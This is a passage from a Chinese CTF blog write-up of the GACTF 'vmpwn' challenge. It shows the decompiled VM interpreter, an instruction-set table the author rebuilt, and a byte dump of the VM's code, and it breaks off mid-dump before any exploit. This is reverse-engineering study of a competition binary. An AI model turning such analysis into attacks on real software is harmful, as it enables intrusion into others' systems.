0x00 前言

CUMTCTF2020 出了一次题,第一次站在出题人角度看ctf比赛,

收获颇多,体会到了出题人的辛苦,不过还好没出什么大问题

0x01 gactf vmpwn

第一次做vmpwn,模拟栈的程序,分析还挺麻烦,看了很久很久甚至不想写这篇博客…虚拟栈嘛肯定要用到逆向的知识

总的思想malloc三块内存,分别存放寄存器、数据、指令

源程序做了一点注释,没写完,好累,下面把所有指令整理成了指令集

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
__int64 __fastcall main(__int64 a1, char **a2, char **a3)
{
  unsigned __int8 *v3; // rax
  _QWORD *v4; // rax
  _QWORD *v5; // rax
  _QWORD *v6; // rax
  int v7; // ST0C_4
  int v8; // ST0C_4
  int v9; // ST0C_4
  int v10; // ST0C_4
  int v11; // ST0C_4
  int v12; // ST0C_4
  int v13; // ST0C_4
  int v14; // ST0C_4
  int v15; // ST0C_4
  int v16; // ST0C_4
  int v17; // ST0C_4
  int v18; // ST0C_4
  int v19; // ST0C_4
  int v20; // ST0C_4
  int v21; // ST0C_4
  int v22; // ST0C_4
  int v23; // ST0C_4
  _QWORD *v24; // rax
  __int64 result; // rax
  signed int v26; // [rsp+Ch] [rbp-24h]
  signed int v27; // [rsp+Ch] [rbp-24h]
  signed int v28; // [rsp+Ch] [rbp-24h]
  signed int v29; // [rsp+Ch] [rbp-24h]
  signed int v30; // [rsp+Ch] [rbp-24h]
  signed int v31; // [rsp+Ch] [rbp-24h]
  signed int v32; // [rsp+Ch] [rbp-24h]
  _QWORD *v33; // [rsp+10h] [rbp-20h]
  char *v34; // [rsp+18h] [rbp-18h]
  char *v35; // [rsp+20h] [rbp-10h]

  sub_BA0();
  v33 = calloc(0x30uLL, 1uLL);
  v34 = (char *)calloc(0x1000uLL, 1uLL);        // .data
  v35 = (char *)calloc(0x2000uLL, 1uLL);
  v33[3] = v35 + 0x1E00;                        // rsp
  v33[5] = &unk_203020;                         // op code
  if ( !v34 || !v35 )
    sub_AC0((__int64)"out of memory");
  while ( 1 )
  {
    v3 = (unsigned __int8 *)v33[5];
    v33[5] = v3 + 1;                            // pc
    switch ( (unsigned int)off_1880 )
    {
      case 0x10u:
        *v33 = v33[3];                          // mov rax,rsp
        break;
      case 0x11u:
        *v33 = *(_QWORD *)v33[5];               // mov rax,i
        v33[5] += 8LL;
        break;
      case 0x12u:
        v33[1] = *(_QWORD *)v33[5];
        v33[5] += 8LL;
        break;
      case 0x13u:
        v33[2] = *(_QWORD *)v33[5];
        v33[5] += 8LL;
        break;
      case 0x20u:
        v26 = *(_QWORD *)v33[5];
        if ( v26 < 0 || v26 > 0xFFF )
          sub_AC0((__int64)"buffer overflow detected");
        *v33 = &v34[v26];                       // mov rax,&data[x]
        v33[5] += 8LL;
        break;
      case 0x21u:
        v27 = *(_QWORD *)v33[5];
        if ( v27 < 0 || v27 > 4095 )
          sub_AC0((__int64)"buffer overflow detected");
        *v33 = *(_QWORD *)&v34[v27];            // mov rax,data[x]
        v33[5] += 8LL;
        break;
      case 0x22u:
        v28 = *(_QWORD *)v33[5];
        if ( v28 < 0 || v28 > 0xFFF )
          sub_AC0((__int64)"buffer overflow detected");
        v33[1] = *(_QWORD *)&v34[v28];
        v33[5] += 8LL;
        break;
      case 0x23u:
        v29 = *(_QWORD *)v33[5];
        if ( v29 < 0 || v29 > 4095 )
          sub_AC0((__int64)"buffer overflow detected");
        v33[2] = *(_QWORD *)&v34[v29];
        v33[5] += 8LL;
        break;
      case 0x33u:
        v30 = *(_QWORD *)v33[5];
        if ( v30 < 0 || v30 > 4095 )
          sub_AC0((__int64)"buffer overflow detected");
        *(_QWORD *)&v34[v30] = *v33;
        v33[5] += 8LL;
        break;
      case 0x34u:
        v31 = *(_QWORD *)v33[5];
        if ( v31 < 0 || v31 > 4095 )
          sub_AC0((__int64)"buffer overflow detected");
        *(_QWORD *)&v34[v31] = v33[1];
        v33[5] += 8LL;
        break;
      case 0x35u:
        v32 = *(_QWORD *)v33[5];
        if ( v32 < 0 || v32 > 4095 )
          sub_AC0((__int64)"buffer overflow detected");
        *(_QWORD *)&v34[v32] = v33[2];
        v33[5] += 8LL;
        break;
      case 0x44u:
        if ( v33[3] - (_QWORD)v35 <= 8LL )
          sub_AC0((__int64)"stack underflow detected");
        v33[3] -= 8LL;
        *(_QWORD *)v33[3] = *v33;               // push rax
        break;
      case 0x45u:
        if ( v33[3] - (_QWORD)v35 <= 8LL )
          sub_AC0((__int64)"stack underflow detected");
        v33[3] -= 8LL;
        *(_QWORD *)v33[3] = v33[1];
        break;
      case 0x46u:
        if ( v33[3] - (_QWORD)v35 <= 8LL )
          sub_AC0((__int64)"stack underflow detected");
        v33[3] -= 8LL;
        *(_QWORD *)v33[3] = v33[2];
        break;
      case 0x51u:
        if ( v33[3] - (_QWORD)v35 > 0x1DFFLL )
          sub_AC0((__int64)"stack overflow detected");
        v4 = (_QWORD *)v33[3];
        v33[3] = v4 + 1;
        *v33 = *v4;
        break;
      case 0x52u:
        if ( v33[3] - (_QWORD)v35 > 7679LL )
          sub_AC0((__int64)"stack overflow detected");
        v5 = (_QWORD *)v33[3];
        v33[3] = v5 + 1;
        v33[1] = *v5;
        break;
      case 0x53u:
        if ( v33[3] - (_QWORD)v35 > 7679LL )
          sub_AC0((__int64)"stack overflow detected");
        v6 = (_QWORD *)v33[3];
        v33[3] = v6 + 1;
        v33[2] = *v6;
        break;
      case 0x61u:
        v7 = *(_QWORD *)v33[5];
        v33[5] += 8LL;
        *v33 += v7;
        break;
      case 0x62u:
        v8 = *(_QWORD *)v33[5];
        v33[5] += 8LL;
        v33[1] += v8;
        break;
      case 0x63u:
        v9 = *(_QWORD *)v33[5];
        v33[5] += 8LL;
        v33[2] += v9;
        break;
      case 0x64u:
        v12 = *(_QWORD *)v33[5];
        v33[5] += 8LL;
        *v33 -= v12;
        break;
      case 0x65u:
        v13 = *(_QWORD *)v33[5];
        v33[5] += 8LL;
        v33[1] -= v13;
        break;
      case 0x66u:
        v14 = *(_QWORD *)v33[5];
        v33[5] += 8LL;
        v33[2] -= v14;
        break;
      case 0x67u:
        v15 = *(_QWORD *)v33[5];
        v33[5] += 8LL;
        *v33 *= v15;
        break;
      case 0x68u:
        v16 = *(_QWORD *)v33[5];
        v33[5] += 8LL;
        v33[1] *= v16;
        break;
      case 0x69u:
        v17 = *(_QWORD *)v33[5];
        v33[5] += 8LL;
        v33[2] *= v17;
        break;
      case 0x6Au:
        v18 = *(_QWORD *)v33[5];
        v33[5] += 8LL;
        *v33 ^= v18;
        break;
      case 0x6Bu:
        v19 = *(_QWORD *)v33[5];
        v33[5] += 8LL;
        v33[1] ^= v19;
        break;
      case 0x6Cu:
        v20 = *(_QWORD *)v33[5];
        v33[5] += 8LL;
        v33[2] ^= v20;
        break;
      case 0x6Du:
        *v33 = 0LL;
        break;
      case 0x6Eu:
        v33[1] = 0LL;
        break;
      case 0x6Fu:
        v33[2] = 0LL;
        break;
      case 0x7Eu:
        v22 = *(signed __int16 *)v33[5];
        v33[5] += 2LL;
        v33[5] += v22;
        break;
      case 0x7Fu:
        v33[5] = *v33;
        break;
      case 0x80u:
        v33[3] += 8LL;
        *(_QWORD *)v33[3] = v33[5];
        v33[5] = *v33;
        break;
      case 0x81u:
        v10 = *(_QWORD *)v33[5];
        v33[5] += 8LL;
        v33[3] += 8LL * (v10 / 8);
        break;
      case 0x82u:
        v11 = *(_QWORD *)v33[5];
        v33[5] += 8LL;
        v33[3] += -8LL * (v11 / 8);
        break;
      case 0x88u:
        v23 = *(signed __int16 *)v33[5];
        v33[5] += 2LL;
        v33[3] += 8LL;
        *(_QWORD *)v33[3] = v33[5];
        v33[5] += v23;
        break;
      case 0x8Fu:
        v21 = *(unsigned __int8 *)v33[5]++;
        ((void (__fastcall *)(_QWORD, _QWORD, _QWORD))*(&off_2038E0 + v21))(*v33, v33[1], v33[2]);
        break;
      case 0x90u:
        v24 = (_QWORD *)v33[3];
        v33[3] = v24 - 1;
        v33[5] = *v24;
        break;
      case 0xFFu:
        return 0LL;
      default:
        printf(":%d\n", *v3);
        sub_AC0((__int64)"Illegal Instrumention");
        return result;
    }
  }
}

理解程序写出指令集

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
//模拟系统调用表
//mov rax,rsp
#define MOV_RAX_RSP 0x10
//mov rax,immediate_value
#define MOV_RAX_I 0x11
//mov rbx,immediate_value
#define MOV_RBX_I 0x12
//mov rcx,immediate_value
#define MOV_RCX_I 0x13
//mov rax,&data_mem[x]
#define MOV_RAX_MEM_ADDR 0x20
//mov rax,data_mem[x]
#define MOV_RAX_MEM 0x21
//mov rbx,data_mem[x]
#define MOV_RBX_MEM 0x22
//mov rcx,data_mem[x]
#define MOV_RCX_MEM 0x23
//mov data_mem[x],rax
#define MOV_MEM_RAX 0x33
//mov data_mem[x],rbx
#define MOV_MEM_RBX 0x34
//mov data_mem[x],rcx
#define MOV_MEM_RCX 0x35
//push rax
#define PUSH_RAX 0x44
//push rbx
#define PUSH_RBX 0x45
//push rcx
#define PUSH_RCX 0x46
//pop rax
#define POP_RAX 0x51
//pop rbx
#define POP_RBX 0x52
//pop rcx
#define POP_RCX 0x53
//add rax,immdiate_value
#define ADD_RAX_I 0x61
//add rbx,immdiate_value
#define ADD_RBX_I 0x62
//add rcx,immdiate_value
#define ADD_RCX_I 0x63
//sub rax,immdiate_value
#define SUB_RAX_I 0x64
//sub rbx,immdiate_value
#define SUB_RBX_I 0x65
//sub rcx,immdiate_value
#define SUB_RCX_I 0x66
//mul rax,immdiate_value
#define MUL_RAX_I 0x67
//mul rbx,immdiate_value
#define MUL_RBX_I 0x68
//mul rcx,immdiate_value
#define MUL_RCX_I 0x69
//xor rax,immdiate_value
#define XOR_RAX_I 0x6A
//xor rbx,immdiate_value
#define XOR_RBX_I 0x6B
//xor rcx,immdiate_value
#define XOR_RCX_I 0x6C
//xor rax,rax
#define ZERO_RAX 0x6D
//xor rbx,rbx
#define ZERO_RBX 0x6E
//xor rcx,rcx
#define ZERO_RCX 0x6F
//syscall
#define SYSCALL 0x8F
//jmp $+-
#define JMP_NEAR 0x7E
//jmp rax
#define JMP_RAX 0x7F
//call rax
#define CALL_RAX 0x80
//call near
#define CALL_NEAR 0x88
//leave
#define LEAVE 0x90
//exit
#define EXIT 0xFF
//add rsp,immdiate_value
#define ADD_RSP_I 0x81
//sub rsp,immdiate_value
#define SUB_RSP_I 0x82

dump出代码段数据:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
//代码段数据
unsigned char ida_chars[] =
{
  0x7E, 0xA5, 0x03, 0x82, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 
  0x00, 0x00, 0x11, 0x23, 0x23, 0x23, 0x23, 0x23, 0x23, 0x23, 
  0x23, 0x33, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
  0x11, 0x23, 0x23, 0x23, 0x23, 0x23, 0x23, 0x23, 0x23, 0x33, 
  0x08, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x11, 0x23, 
  0x23, 0x23, 0x23, 0x23, 0x23, 0x23, 0x23, 0x33, 0x10, 0x00, 
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x11, 0x23, 0x23, 0x23, 
  0x23, 0x23, 0x23, 0x23, 0x23, 0x33, 0x18, 0x00, 0x00, 0x00, 
  0x00, 0x00, 0x00, 0x00, 0x11, 0x23, 0x23, 0x23, 0x23, 0x23, 
  0x23, 0x23, 0x23, 0x33, 0x20, 0x00, 0x00, 0x00, 0x00, 0x00, 
  0x00, 0x00, 0x11, 0x0A, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
  0x00, 0x33, 0x28, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
  0x20, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x44, 
  0x52, 0x11, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
  0x13, 0x29, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x8F, 
  0x01, 0x11, 0x23, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 
  0x33, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x11, 
  0x20, 0x20, 0x77, 0x65, 0x6C, 0x63, 0x6F, 0x6D, 0x33, 0x08, 
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x11, 0x65, 0x20, 
  0x74, 0x6F, 0x20, 0x32, 0x30, 0x32, 0x33, 0x10, 0x00, 0x00, 
  0x00, 0x00, 0x00, 0x00, 0x00, 0x11, 0x30, 0x20, 0x47, 0x41, 
  0x43, 0x54, 0x46, 0x20, 0x33, 0x18, 0x00, 0x00, 0x00, 0x00, 
  0x00, 0x00, 0x00, 0x11, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 
  0x20, 0x23, 0x33, 0x20, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
  0x00, 0x11, 0x0A, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
  0x33, 0x28, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x20, 
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x44, 0x52, 
  0x11, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x13, 
  0x29, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x8F, 0x01, 
  0x11, 0x23, 0x20, 0x20, 0x20, 0x74, 0x68, 0x69, 0x73, 0x33, 
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x11, 0x20, 
  0x69, 0x73, 0x20, 0x61, 0x20, 0x6D, 0x65, 0x33, 0x08, 0x00, 
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x11, 0x73, 0x73, 0x61, 
  0x67, 0x65, 0x20, 0x66, 0x72, 0x33, 0x10, 0x00, 0x00, 0x00, 
  0x00, 0x00, 0x00, 0x00, 0x11, 0x6F, 0x6D, 0x20, 0x76, 0x6D, 
  0x20, 0x6D, 0x61, 0x33, 0x18, 0x00, 0x00, 0x00, 0x00, 0x00, 
  0x00, 0x00, 0x11, 0x63, 0x68, 0x69, 0x6E, 0x65, 0x20, 0x20, 
  0x23, 0x33, 0x20, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
  0x11, 0x0A, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x33, 
  0x28, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x20, 0x00, 
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x44, 0x52, 0x11, 
  0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x13, 0x29, 
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x8F, 0x01, 0x11, 
  0x23, 0x23, 0x23, 0x23, 0x23, 0x23, 0x23, 0x23, 0x33, 0x00, 
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x11, 0x23, 0x23, 
  0x23, 0x23, 0x23, 0x23, 0x23, 0x23, 0x33, 0x08, 0x00, 0x00, 
  0x00, 0x00, 0x00, 0x00, 0x00, 0x11, 0x23, 0x23, 0x23, 0x23, 
  0x23, 0x23, 0x23, 0x23, 0x33, 0x10, 0x00, 0x00, 0x00, 0x00, 
  0x00, 0x00, 0x00, 0x11, 0x23, 0x23, 0x23, 0x23, 0x23, 0x23, 
  0x23, 0x23, 0x33, 0x18, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
  0x00, 0x11, 0x23, 0x23, 0x23, 0x23, 0x23, 0x23, 0x23, 0x23, 
  0x33, 0x20, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x11, 
  0x0A, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x33, 0x28, 
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x20, 0x00, 0x00, 
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x44, 0x52, 0x11, 0x01, 
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x13, 0x29, 0x00, 
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x8F, 0x01, 0x11, 0x23, 
  0x74, 0x65, 0x6C, 0x6C, 0x20, 0x6D, 0x65, 0x33, 0x00, 0x00, 
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x11, 0x20, 0x77, 0x68, 
  0x61, 0x74, 0x20, 0x69, 0x73, 0x33, 0x08, 0x00, 0x00, 0x00, 
  0x00, 0x00, 0x00, 0x00, 0x11, 0x20, 0x79, 0x6F, 0x75, 0x72, 
  0x20, 0x6E, 0x61, 0x33, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 
  0x00, 0x00, 0x11, 0x6D, 0x65, 0x3A, 0x00, 0x00, 0x00, 0x00, 
  0x00, 0x33, 0x18, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
  0x20, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x44, 
  0x52, 0x11, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
  0x13, 0x1B, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x8F, 
  0x01, 0x10, 0x44, 0x52, 0x11, 0x00, 0x00, 0x00, 0x00, 0x00, 
  0x00, 0x00, 0x00, 0x13, 0x00, 0x10, 0x00, 0x00, 0x00, 0x00, 
  0x00, 0x00, 0x8F, 0x00, 0x10, 0x8F, 0x02, 0x11, 0x6F, 0x6B, 
  0x2C, 0x77, 0x68, 0x61, 0x74, 0x20, 0x33, 0x00, 0x00, 0x00, 
  0x00, 0x00, 0x00, 0x00, 0x00, 0x11, 0x64, 0x6F, 0x20, 0x79, 
  0x6F, 0x75, 0x20, 0x77, 0x33, 0x08, 0x00, 0x00, 0x00, 0x00, 
  0x00, 0x00, 0x00, 0x11, 0x61, 0x6E, 0x74, 0x20, 0x74, 0x6F, 
  0x20, 0x73, 0x33, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
  0x00, 0x11, 0x61, 0x79, 0x3A, 0x00, 0x00, 0x00, 0x00, 0x00, 
  0x33, 0x18, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x20, 
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x44, 0x52, 
  0x11, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x13, 
  0x1B, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x8F, 0x01, 
  0x10, 0x44, 0x52, 0x11, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
  0x00, 0x00, 0x13, 0x00, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 
  0x00, 0x8F, 0x00, 0x11, 0x4E, 0x6F, 0x77, 0x2C, 0x49, 0x20, 
  0x72, 0x65, 0x33, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
  0x00, 0x11, 0x63, 0x65, 0x76, 0x69, 0x65, 0x20, 0x79, 0x6F, 
  0x33, 0x08, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x11, 
  0x75, 0x72, 0x20, 0x6D, 0x65, 0x73, 0x73, 0x61, 0x33, 0x10, 
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x11, 0x67, 0x65, 
  0x2C, 0x62, 0x79, 0x65, 0x7E, 0x0A, 0x33, 0x18, 0x00, 0x00, 
  0x00, 0x00, 0x00, 0x00, 0x00, 0x20, 0x00, 0x00, 0x00, 0x00, 
  0x00, 0x00, 0x00, 0x00, 0x44, 0x52, 0x11, 0x01, 0x00, 0x00, 
  0x00, 0x00, 0x00, 0x00, 0x00, 0x13, 0x20, 0x00, 0x00, 0x00, 
  0x00, 0x00, 0x00, 0x00, 0x8F, 0x01, 0x81, 0x00, 0x01, 0x00, 
  0x00, 0x00, 0x00, 0x00, 0x00, 0x90, 0x11, 0x20, 0x5F, 0x5F, 
  0x5F, 0x5F, 0x5F, 0x20, 0x20, 0x33, 0x00, 0x00, 0x00, 0x00, 
  0x00, 0x00, 0x00, 0x00, 0x11, 0x20, 0x20, 0x20, 0x20, 0x20, 
  0x5F, 0x5F, 0x5F, 0x33, 0x08, 0x00, 0x00, 0x00, 0x00, 0x00, 
  0x00, 0x00, 0x11, 0x20, 0x20, 0x20, 0x5F, 0x5F, 0x5F, 0x5F, 
  0x5F, 0x33, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
  0x11, 0x20, 0x20, 0x20, 0x5F, 0x5F, 0x5F, 0x5F, 0x5F, 0x33, 
  0x18, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x11, 0x20, 
  0x20, 0x20, 0x5F, 0x5F, 0x5F, 0x5F, 0x5F, 0x33, 0x20, 0x00, 
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x11, 0x20, 0x20, 0x20, 
  0x20, 0x20, 0x20, 0x20, 0x20, 0x33, 0x28, 0x00, 0x00, 0x00, 
  0x00, 0x00, 0x00, 0x00, 0x11, 0x5F, 0x20, 0x20, 0x20, 0x20, 
  0x20, 0x5F, 0x20, 0x33, 0x30, 0x00, 0x00, 0x00, 0x00, 0x00, 
  0x00, 0x00, 0x11, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x5F, 
  0x5F, 0x33, 0x38, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
  0x11, 0x5F, 0x20, 0x20, 0x5F, 0x5F, 0x5F, 0x0A, 0x00, 0x33, 
  0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x20, 0x00, 
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x44, 0x52, 0x11, 
  0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x13, 0x47, 
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x8F, 0x01, 0x11, 
  0x2F, 0x20, 0x20, 0x5F, 0x5F, 0x5F, 0x7C, 0x20, 0x33, 0x00, 
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x11, 0x20, 0x20, 
  0x20, 0x20, 0x2F, 0x20, 0x20, 0x20, 0x33, 0x08, 0x00, 0x00, 
  0x00, 0x00, 0x00, 0x00, 0x00, 0x11, 0x7C, 0x20, 0x2F, 0x20, 
  0x20, 0x5F, 0x5F, 0x5F, 0x33, 0x10, 0x00, 0x00, 0x00, 0x00, 
  0x00, 0x00, 0x00, 0x11, 0x7C, 0x20, 0x7C, 0x5F, 0x20, 0x20, 
  0x20, 0x5F, 0x33, 0x18, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
  0x00, 0x11, 0x7C, 0x20, 0x7C, 0x20, 0x20, 0x5F, 0x5F, 0x5F, 
  0x33, 0x20, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x11, 
  0x7C, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x7C, 0x33, 0x28, 
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x11, 0x20, 0x7C, 
  0x20, 0x20, 0x20, 0x2F, 0x20, 0x2F, 0x33, 0x30, 0x00, 0x00, 
  0x00, 0x00, 0x00, 0x00, 0x00, 0x11, 0x20, 0x20, 0x20, 0x20, 
  0x20, 0x2F, 0x20, 0x20, 0x33, 0x38, 0x00, 0x00, 0x00, 0x00, 
  0x00, 0x00, 0x00, 0x11, 0x20, 0x7C, 0x2F, 0x20, 0x20, 0x20, 
  0x7C, 0x0A, 0x33, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
  0x00, 0x20, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
  0x44, 0x52, 0x11, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
  0x00, 0x13, 0x48, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
  0x8F, 0x01, 0x11, 0x7C, 0x20, 0x7C, 0x20, 0x20, 0x20, 0x20, 
  0x20, 0x33, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
  0x11, 0x20, 0x20, 0x20, 0x2F, 0x20, 0x2F, 0x7C, 0x20, 0x33, 
  0x08, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x11, 0x7C, 
  0x20, 0x7C, 0x20, 0x7C, 0x20, 0x20, 0x20, 0x33, 0x10, 0x00, 
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x11, 0x20, 0x20, 0x20, 
  0x20, 0x7C, 0x20, 0x7C, 0x20, 0x33, 0x18, 0x00, 0x00, 0x00, 
  0x00, 0x00, 0x00, 0x00, 0x11, 0x20, 0x20, 0x7C, 0x20, 0x7C, 
  0x5F, 0x5F, 0x20, 0x33, 0x20, 0x00, 0x00, 0x00, 0x00, 0x00, 
  0x00, 0x00, 0x11, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 
  0x7C, 0x33, 0x28, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
  0x11, 0x20, 0x7C, 0x20, 0x20, 0x2F, 0x20, 0x2F, 0x20, 0x33, 
  0x30, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x11, 0x20, 
  0x20, 0x20, 0x20, 0x2F, 0x20, 0x2F, 0x7C, 0x33, 0x38, 0x00, 
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x11, 0x20, 0x20, 0x20, 
  0x2F, 0x7C, 0x20, 0x7C, 0x0A, 0x33, 0x40, 0x00, 0x00, 0x00, 
  0x00, 0x00, 0x00, 0x00, 0x20, 0x00, 0x00, 0x00, 0x00, 0x00, 
  0x00, 0x00, 0x00, 0x44, 0x52, 0x11, 0x01, 0x00, 0x00, 0x00, 
  0x00, 0x00, 0x00, 0x00, 0x13, 0x48, 0x00, 0x00, 0x00, 0x00, 
  0x00, 0x00, 0x00, 0x8F, 0x01, 0x11, 0x7C, 0x20, 0x7C, 0x20, 
  0x20, 0x5F, 0x20, 0x20, 0x33, 0x00, 0x00, 0x00, 0x00, 0x00, 
  0x00, 0x00, 0x00, 0x11, 0x20, 0x20, 0x2F, 0x20, 0x2F, 0x20, 
  0x7C, 0x20, 0x33, 0x08, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
  0x00, 0x11, 0x7C, 0x20, 0x7C, 0x20, 0x7C, 0x20, 0x20, 0x20, 
  0x33, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x11, 
  0x20, 0x20, 0x20, 0x20, 0x7C, 0x20, 0x7C, 0x20, 0x33, 0x18, 
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x11, 0x20, 0x20, 
  0x7C, 0x20, 0x20, 0x5F, 0x5F, 0x7C, 0x33, 0x20, 0x00, 0x00, 
  0x00, 0x00, 0x00, 0x00, 0x00, 0x11, 0x20, 0x20, 0x20, 0x20, 
  0x20, 0x20, 0x20, 0x7C, 0x33, 0x28, 0x00, 0x00, 0x00, 0x00, 
